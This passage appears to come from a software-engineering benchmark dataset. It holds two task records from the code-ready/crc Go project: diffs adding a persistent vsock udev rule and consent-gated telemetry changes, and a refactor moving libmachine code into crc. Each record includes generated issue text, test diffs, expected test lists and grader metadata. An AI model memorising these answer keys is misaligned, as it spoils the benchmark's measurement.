crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git 
a/pkg/crc/preflight/preflight_linux.go b/pkg/crc/preflight/preflight_linux.go index f2e7ff45f..e2587c8c1 100644 --- a/pkg/crc/preflight/preflight_linux.go +++ b/pkg/crc/preflight/preflight_linux.go @@ -8,6 +8,7 @@ import ( "strings" "syscall" + crcErrors "github.com/code-ready/crc/pkg/crc/errors" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/network" crcos "github.com/code-ready/crc/pkg/os" @@ -97,13 +98,20 @@ var libvirtNetworkPreflightChecks = [...]Check{ } var vsockPreflightChecks = Check{ - configKeySuffix: "check-vsock", - checkDescription: "Checking if vsock is correctly configured", - check: checkVsock, - fixDescription: "Checking if vsock is correctly configured", - fix: fixVsock, + configKeySuffix: "check-vsock", + checkDescription: "Checking if vsock is correctly configured", + check: checkVsock, + fixDescription: "Checking if vsock is correctly configured", + fix: fixVsock, + cleanupDescription: "Removing vsock configuration", + cleanup: removeVsockCrcSettings, } +const ( + vsockUdevRulesPath = "/usr/lib/udev/rules.d/99-crc-vsock.rules" + vsockModuleAutoLoadConfPath = "/etc/modules-load.d/vhost_vsock.conf" +) + func checkVsock() error { executable, err := os.Executable() if err != nil { @@ -126,7 +134,7 @@ func checkVsock() error { return err } if group.Name != "libvirt" { - return errors.New("/dev/vsock is not is the right group") + return errors.New("/dev/vsock is not in the right group") } } else { return errors.New("cannot cast info") @@ -146,21 +154,39 @@ func fixVsock() error { if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") + + udevRule := `KERNEL=="vsock", MODE="0660", OWNER="root", GROUP="libvirt"` + err = crcos.WriteToFileAsRoot("Create udev rule for /dev/vsock", udevRule, vsockUdevRulesPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chown /dev/vsock", "chown", "root:libvirt", "/dev/vsock") + err = 
crcos.WriteToFileAsRoot(fmt.Sprintf("Create file %s", vsockModuleAutoLoadConfPath), "vhost_vsock", vsockModuleAutoLoadConfPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chmod /dev/vsock", "chmod", "g+rw", "/dev/vsock") + _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") if err != nil { return err } return nil } +func removeVsockCrcSettings() error { + var mErr crcErrors.MultiError + _, _, err := crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockUdevRulesPath), "rm", "-f", vsockUdevRulesPath) + if err != nil { + mErr.Collect(err) + } + _, _, err = crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockModuleAutoLoadConfPath), "rm", "-f", vsockModuleAutoLoadConfPath) + if err != nil { + mErr.Collect(err) + } + if len(mErr.Errors) == 0 { + return nil + } + return mErr +} + func getAllPreflightChecks() []Check { checks := getPreflightChecksForDistro(distro(), network.DefaultMode) checks = append(checks, vsockPreflightChecks) diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). - Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). 
+ Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) }
Use udev rule to configure the permission and group for /dev/vsock This would persist the permissions and group change after reboot
**Title** Persist vsock permissions and improve telemetry reporting **Problem** * vsock device permissions and group ownership are not retained after a reboot. * Telemetry uploads lack execution duration, success status, and OS information, and misuse the Identify call. **Root Cause** * The vsock pre‑flight fix only altered the device on‑the‑fly (chown/chmod) without creating persistent udev rules or ensuring the kernel module loads automatically. * Telemetry code sent only an Identify event with an error string, omitting useful metrics and mixing event types. **Fix / Expected Behavior** - Measure command execution time and pass the duration, success flag, and any error to telemetry. - Send OS information in an Identify event and command details in a Track event. - Create a persistent udev rule and a modules‑load configuration for the vsock device, and load the module at fix time. - Provide a cleanup routine that removes the added udev rule and modules‑load file when the vsock check is undone. - Relocate the NetworkManager dispatcher script to its correct directory and delete the legacy script to avoid stale configuration. **Risk & Validation** - Verify that telemetry respects user consent and that no panic occurs when uploading metrics. - Confirm that after applying the fix, `/dev/vsock` retains the correct group and mode across reboots and that the cleanup removes the created files. - Run the pre‑flight and networking test suites to ensure the updated dispatcher path does not break DNS split‑tunneling.
1,801
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select {
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: (*Client).Upload(action string, duration time.Duration, err error) error Location: pkg/crc/segment/segment.go Inputs: - **action** (string): name of the telemetry event (e.g., “start”). - **duration** (time.Duration): elapsed time of the operation, recorded in milliseconds. - **err** (error): the error returned by the operation; may be nil to indicate success. Outputs: - **error**: any error produced while sending telemetry (including configuration/consent errors). Returns nil when telemetry is successfully queued or when telemetry consent is disabled. Description: Sends telemetry to Segment when consent is enabled. First queues an **Identify** call containing the OS trait, then queues a **Track** call with the given action, a “success” flag, the duration in ms, and the error message (if any). The method now requires the caller to supply the operation duration.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 4, "num_modified_lines": 84, "pr_author": "anjannath", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue asks for a persistent udev rule to set /dev/vsock permissions and group. The provided tests, however, focus on changes to the telemetry client (new Upload signature, OS trait, duration property) which are unrelated to the udev rule. Thus the test suite couples this task to an unrelated feature, causing a mismatch between the issue intent and test expectations. This signals a test‑suite coupling problem (B1).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify segment client behavior (Upload now requires duration, adds OS trait and track events) which is not mentioned in the issue.", "Test expectations for telemetry data are unrelated to the vsock udev rule described." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ea33a56c2cac947eca13ae7fd4696da1fb511653
2020-12-24 09:54:18
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1802#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> guillaumerose: Ready for an other round of review :) openshift-ci-robot: @guillaumerose: PR needs rebase. <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. </details> guillaumerose: I also hesitated for hyperv driver but at the end, it is much easier to have machine reduced to the strict minimum. The major benefits is the ability to share code between preflights and the driver (how we invoke powershell, etc). praveenkumar: /needs-rebase guillaumerose: rebased!
code-ready__crc-1802
diff --git a/Makefile b/Makefile index e17520a54..16a5b83c9 100644 --- a/Makefile +++ b/Makefile @@ -102,7 +102,7 @@ cross: $(BUILD_DIR)/macos-amd64/crc $(BUILD_DIR)/linux-amd64/crc $(BUILD_DIR)/wi .PHONY: test test: - go test --tags build -v -ldflags="$(VERSION_VARIABLES)" ./pkg/... ./cmd/... + go test -race --tags build -v -ldflags="$(VERSION_VARIABLES)" ./pkg/... ./cmd/... .PHONY: build_docs build_docs: diff --git a/appveyor.yml b/appveyor.yml index ccf77c985..2d04c171f 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -4,6 +4,7 @@ environment: GOPATH: c:\gopath stack: go 1.14 before_test: + - choco install mingw - choco install make - make cross test_script: diff --git a/pkg/crc/machine/driver.go b/pkg/crc/machine/driver.go index 12aa40b06..249265bf3 100644 --- a/pkg/crc/machine/driver.go +++ b/pkg/crc/machine/driver.go @@ -2,8 +2,8 @@ package machine import ( "github.com/code-ready/crc/pkg/crc/machine/config" + "github.com/code-ready/crc/pkg/libmachine/host" libmachine "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" ) type valueSetter func(driver *libmachine.VMDriver) bool diff --git a/pkg/crc/machine/driver_darwin.go b/pkg/crc/machine/driver_darwin.go index 92ad9b960..2c1387a6d 100644 --- a/pkg/crc/machine/driver_darwin.go +++ b/pkg/crc/machine/driver_darwin.go @@ -7,9 +7,9 @@ import ( "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/hyperkit" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" machineHyperkit "github.com/code-ready/machine/drivers/hyperkit" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/driver_linux.go b/pkg/crc/machine/driver_linux.go index 65336ee90..6613d44c8 100644 --- 
a/pkg/crc/machine/driver_linux.go +++ b/pkg/crc/machine/driver_linux.go @@ -7,9 +7,9 @@ import ( "github.com/code-ready/crc/pkg/crc/constants" "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/libvirt" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" machineLibvirt "github.com/code-ready/machine/drivers/libvirt" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/driver_windows.go b/pkg/crc/machine/driver_windows.go index ffcc4ad49..1f9993788 100644 --- a/pkg/crc/machine/driver_windows.go +++ b/pkg/crc/machine/driver_windows.go @@ -6,9 +6,9 @@ import ( "github.com/code-ready/crc/pkg/crc/machine/config" "github.com/code-ready/crc/pkg/crc/machine/hyperv" - machineHyperv "github.com/code-ready/machine/drivers/hyperv" - "github.com/code-ready/machine/libmachine" - "github.com/code-ready/machine/libmachine/host" + machineHyperv "github.com/code-ready/crc/pkg/drivers/hyperv" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" ) func newHost(api libmachine.API, machineConfig config.MachineConfig) (*host.Host, error) { diff --git a/pkg/crc/machine/hyperv/driver_windows.go b/pkg/crc/machine/hyperv/driver_windows.go index f63ef4f57..be4dae9ed 100644 --- a/pkg/crc/machine/hyperv/driver_windows.go +++ b/pkg/crc/machine/hyperv/driver_windows.go @@ -2,11 +2,9 @@ package hyperv import ( "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/machine/drivers/hyperv" - "github.com/code-ready/crc/pkg/crc/machine/config" - + "github.com/code-ready/crc/pkg/crc/network" + "github.com/code-ready/crc/pkg/drivers/hyperv" winnet "github.com/code-ready/crc/pkg/os/windows/network" ) @@ -18,6 +16,7 @@ func CreateHost(machineConfig 
config.MachineConfig) *hyperv.Driver { hypervDriver.DisableDynamicMemory = true if machineConfig.NetworkMode == network.VSockMode { + hypervDriver.VirtualSwitch = "" } else { // Determine the Virtual Switch to be used diff --git a/pkg/crc/machine/machine.go b/pkg/crc/machine/machine.go index 4f14c9d94..cdb1599c2 100644 --- a/pkg/crc/machine/machine.go +++ b/pkg/crc/machine/machine.go @@ -9,9 +9,9 @@ import ( "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine/bundle" "github.com/code-ready/crc/pkg/crc/network" - "github.com/code-ready/machine/libmachine" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" "github.com/code-ready/machine/libmachine/log" ) diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index b844edbab..f5ac9fe91 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,10 +23,10 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" + "github.com/code-ready/crc/pkg/libmachine" + "github.com/code-ready/crc/pkg/libmachine/host" crcos "github.com/code-ready/crc/pkg/os" - "github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/host" "github.com/code-ready/machine/libmachine/state" "github.com/docker/go-units" "github.com/pkg/errors" diff --git a/vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go b/pkg/drivers/hyperv/hyperv.go similarity index 98% rename from vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go rename to pkg/drivers/hyperv/hyperv.go index f521544ac..3c054d24a 100644 --- a/vendor/github.com/code-ready/machine/drivers/hyperv/hyperv.go +++ b/pkg/drivers/hyperv/hyperv.go @@ -6,9 +6,9 @@ import ( "fmt" "time" + log 
"github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/state" ) diff --git a/vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go b/pkg/drivers/hyperv/powershell.go similarity index 98% rename from vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go rename to pkg/drivers/hyperv/powershell.go index ba1b81c1e..dbfa652ea 100644 --- a/vendor/github.com/code-ready/machine/drivers/hyperv/powershell.go +++ b/pkg/drivers/hyperv/powershell.go @@ -9,7 +9,7 @@ import ( "fmt" - "github.com/code-ready/machine/libmachine/log" + log "github.com/code-ready/crc/pkg/crc/logging" ) var powershell string diff --git a/vendor/github.com/code-ready/machine/drivers/none/driver.go b/pkg/drivers/none/driver.go similarity index 100% rename from vendor/github.com/code-ready/machine/drivers/none/driver.go rename to pkg/drivers/none/driver.go diff --git a/vendor/github.com/code-ready/machine/libmachine/host/host.go b/pkg/libmachine/host/host.go similarity index 92% rename from vendor/github.com/code-ready/machine/libmachine/host/host.go rename to pkg/libmachine/host/host.go index 7dccbbc09..f257ca694 100644 --- a/vendor/github.com/code-ready/machine/libmachine/host/host.go +++ b/pkg/libmachine/host/host.go @@ -5,10 +5,10 @@ import ( "net/rpc" "regexp" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/drivers" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" - "github.com/code-ready/machine/libmachine/mcnutils" "github.com/code-ready/machine/libmachine/state" ) diff --git 
a/vendor/github.com/code-ready/machine/libmachine/host/migrate.go b/pkg/libmachine/host/migrate.go similarity index 91% rename from vendor/github.com/code-ready/machine/libmachine/host/migrate.go rename to pkg/libmachine/host/migrate.go index f63bb4a3f..e5d3a7dc6 100644 --- a/vendor/github.com/code-ready/machine/libmachine/host/migrate.go +++ b/pkg/libmachine/host/migrate.go @@ -5,8 +5,8 @@ import ( "errors" "fmt" - "github.com/code-ready/machine/drivers/none" - "github.com/code-ready/machine/libmachine/version" + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/version" ) var ( diff --git a/vendor/github.com/code-ready/machine/libmachine/libmachine.go b/pkg/libmachine/libmachine.go similarity index 90% rename from vendor/github.com/code-ready/machine/libmachine/libmachine.go rename to pkg/libmachine/libmachine.go index 1e122a56e..8a7109a1f 100644 --- a/vendor/github.com/code-ready/machine/libmachine/libmachine.go +++ b/pkg/libmachine/libmachine.go @@ -5,16 +5,16 @@ import ( "fmt" "io" - "github.com/code-ready/machine/drivers/hyperv" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/drivers/hyperv" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" + "github.com/code-ready/crc/pkg/libmachine/mcnutils" + "github.com/code-ready/crc/pkg/libmachine/persist" + "github.com/code-ready/crc/pkg/libmachine/version" "github.com/code-ready/machine/libmachine/drivers" rpcdriver "github.com/code-ready/machine/libmachine/drivers/rpc" - "github.com/code-ready/machine/libmachine/host" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" - "github.com/code-ready/machine/libmachine/mcnutils" - "github.com/code-ready/machine/libmachine/persist" "github.com/code-ready/machine/libmachine/state" - "github.com/code-ready/machine/libmachine/version" ) type API interface { diff --git 
a/vendor/github.com/code-ready/machine/libmachine/persist/filestore.go b/pkg/libmachine/persist/filestore.go similarity index 94% rename from vendor/github.com/code-ready/machine/libmachine/persist/filestore.go rename to pkg/libmachine/persist/filestore.go index ef43f9f45..2ee5e0b6b 100644 --- a/vendor/github.com/code-ready/machine/libmachine/persist/filestore.go +++ b/pkg/libmachine/persist/filestore.go @@ -7,9 +7,9 @@ import ( "os" "path/filepath" - "github.com/code-ready/machine/libmachine/host" - "github.com/code-ready/machine/libmachine/log" - "github.com/code-ready/machine/libmachine/mcnerror" + log "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/mcnerror" ) type Filestore struct { diff --git a/vendor/github.com/code-ready/machine/libmachine/persist/store.go b/pkg/libmachine/persist/store.go similarity index 87% rename from vendor/github.com/code-ready/machine/libmachine/persist/store.go rename to pkg/libmachine/persist/store.go index fcda4656f..4bee232e4 100644 --- a/vendor/github.com/code-ready/machine/libmachine/persist/store.go +++ b/pkg/libmachine/persist/store.go @@ -1,7 +1,7 @@ package persist import ( - "github.com/code-ready/machine/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/host" ) type Store interface { diff --git a/pkg/libmachine/version/version.go b/pkg/libmachine/version/version.go new file mode 100644 index 000000000..3cacffdb0 --- /dev/null +++ b/pkg/libmachine/version/version.go @@ -0,0 +1,11 @@ +package version + +var ( + // APIVersion dictates which version of the libmachine API this is. + APIVersion = 1 + + // ConfigVersion dictates which version of the config.json format is + // used. It needs to be bumped if there is a breaking change, and + // therefore migration, introduced to the config file format. 
+ ConfigVersion = 3 +) diff --git a/vendor/modules.txt b/vendor/modules.txt index 26119e3f7..a6e259a90 100644 --- a/vendor/modules.txt +++ b/vendor/modules.txt @@ -43,18 +43,11 @@ github.com/code-ready/gvisor-tap-vsock/pkg/virtualnetwork # github.com/code-ready/machine v0.0.0-20201202090222-9558ae8c05b9 ## explicit github.com/code-ready/machine/drivers/hyperkit -github.com/code-ready/machine/drivers/hyperv github.com/code-ready/machine/drivers/libvirt -github.com/code-ready/machine/drivers/none -github.com/code-ready/machine/libmachine github.com/code-ready/machine/libmachine/drivers github.com/code-ready/machine/libmachine/drivers/plugin/localbinary github.com/code-ready/machine/libmachine/drivers/rpc -github.com/code-ready/machine/libmachine/host github.com/code-ready/machine/libmachine/log -github.com/code-ready/machine/libmachine/mcnerror -github.com/code-ready/machine/libmachine/mcnutils -github.com/code-ready/machine/libmachine/persist github.com/code-ready/machine/libmachine/state github.com/code-ready/machine/libmachine/version # github.com/cucumber/gherkin-go/v11 v11.0.0
Import 90% of machine code in crc Only drivers (rpc, driver interface, hyperkit and libvirt structs) and state are left in code-ready/machine. It will be easier to refactor machine code: better tests in the future, etc. All the persistence is now done in crc side. code-ready/machine is stateless and also all drivers. will enable https://github.com/code-ready/machine/pull/54
**Title** Refactor machine component imports and improve test setup **Problem** The CRC codebase now contains the former machine implementation, but many source files still import the old vendored machine packages, causing compilation failures. The test command also omitted the race detector, and the CI environment lacked a required tool for building on Windows. **Root Cause** Residual import paths and build script settings were left unchanged after the migration of machine code into the CRC repository. **Fix / Expected Behavior** - Update all references to point to the new internal machine, driver, and libmachine packages. - Introduce a centralized version definition for the libmachine API and configuration format. - Switch the standard test command to run with the Go race detector. - Add the missing Windows tool installation step to the CI configuration. - Ensure logging and utility imports use the CRC logging package consistently. **Risk & Validation** - Risk of breaking external consumers that might still rely on the previous vendored paths; mitigated by running the full test suite. - Verify that the project builds on all supported platforms and that `go test -race ./...` completes without failures. - Confirm CI pipelines pass after the added tool installation and updated test command.
1,802
code-ready/crc
diff --git a/pkg/libmachine/host/host_test.go b/pkg/libmachine/host/host_test.go new file mode 100644 index 000000000..9b724352f --- /dev/null +++ b/pkg/libmachine/host/host_test.go @@ -0,0 +1,37 @@ +package host + +import ( + "testing" + + _ "github.com/code-ready/crc/pkg/drivers/none" +) + +func TestValidateHostnameValid(t *testing.T) { + hosts := []string{ + "zomg", + "test-ing", + "some.h0st", + } + + for _, v := range hosts { + isValid := ValidateHostName(v) + if !isValid { + t.Fatalf("Thought a valid hostname was invalid: %s", v) + } + } +} + +func TestValidateHostnameInvalid(t *testing.T) { + hosts := []string{ + "zom_g", + "test$ing", + "some😄host", + } + + for _, v := range hosts { + isValid := ValidateHostName(v) + if isValid { + t.Fatalf("Thought an invalid hostname was valid: %s", v) + } + } +} diff --git a/pkg/libmachine/host/migrate_test.go b/pkg/libmachine/host/migrate_test.go new file mode 100644 index 000000000..6d1f9b3f3 --- /dev/null +++ b/pkg/libmachine/host/migrate_test.go @@ -0,0 +1,44 @@ +package host + +import ( + "testing" + + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/stretchr/testify/assert" +) + +func TestLoadUnsupportedConfiguration(t *testing.T) { + _, err := MigrateHost("default", []byte(`{"ConfigVersion": 4}`)) + assert.Equal(t, err, errUnexpectedConfigVersion) +} + +func TestLoadHost(t *testing.T) { + driverJSON := `{ + "IPAddress": "192.168.130.11", + "MachineName": "crc", + "BundleName": "crc_libvirt_4.6.6.crcbundle", + "Memory": 9216, + "CPU": 4 + }` + + host, err := MigrateHost("default", []byte(`{ + "ConfigVersion": 3, + "Driver": `+driverJSON+`, + "DriverName": "libvirt", + "DriverPath": "/home/john/.crc/bin", + "Name": "crc" +}`)) + + assert.NoError(t, err) + assert.Equal(t, &Host{ + ConfigVersion: 3, + Name: "crc", + DriverName: "libvirt", + DriverPath: "/home/john/.crc/bin", + RawDriver: []byte(driverJSON), + Driver: &RawDataDriver{ + Data: []byte(driverJSON), + Driver: none.NewDriver("default", ""), + }, + 
}, host) +} diff --git a/pkg/libmachine/hosttest/default_test_host.go b/pkg/libmachine/hosttest/default_test_host.go new file mode 100644 index 000000000..1bd92d365 --- /dev/null +++ b/pkg/libmachine/hosttest/default_test_host.go @@ -0,0 +1,22 @@ +package hosttest + +import ( + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/version" +) + +const ( + DefaultHostName = "test-host" +) + +func GetDefaultTestHost() (*host.Host, error) { + driver := none.NewDriver(DefaultHostName, "/tmp/artifacts") + + return &host.Host{ + ConfigVersion: version.ConfigVersion, + Name: DefaultHostName, + Driver: driver, + DriverName: "none", + }, nil +} diff --git a/vendor/github.com/code-ready/machine/libmachine/mcnerror/errors.go b/pkg/libmachine/mcnerror/errors.go similarity index 100% rename from vendor/github.com/code-ready/machine/libmachine/mcnerror/errors.go rename to pkg/libmachine/mcnerror/errors.go diff --git a/vendor/github.com/code-ready/machine/libmachine/mcnutils/utils.go b/pkg/libmachine/mcnutils/utils.go similarity index 100% rename from vendor/github.com/code-ready/machine/libmachine/mcnutils/utils.go rename to pkg/libmachine/mcnutils/utils.go diff --git a/pkg/libmachine/mcnutils/utils_test.go b/pkg/libmachine/mcnutils/utils_test.go new file mode 100644 index 000000000..e447b41db --- /dev/null +++ 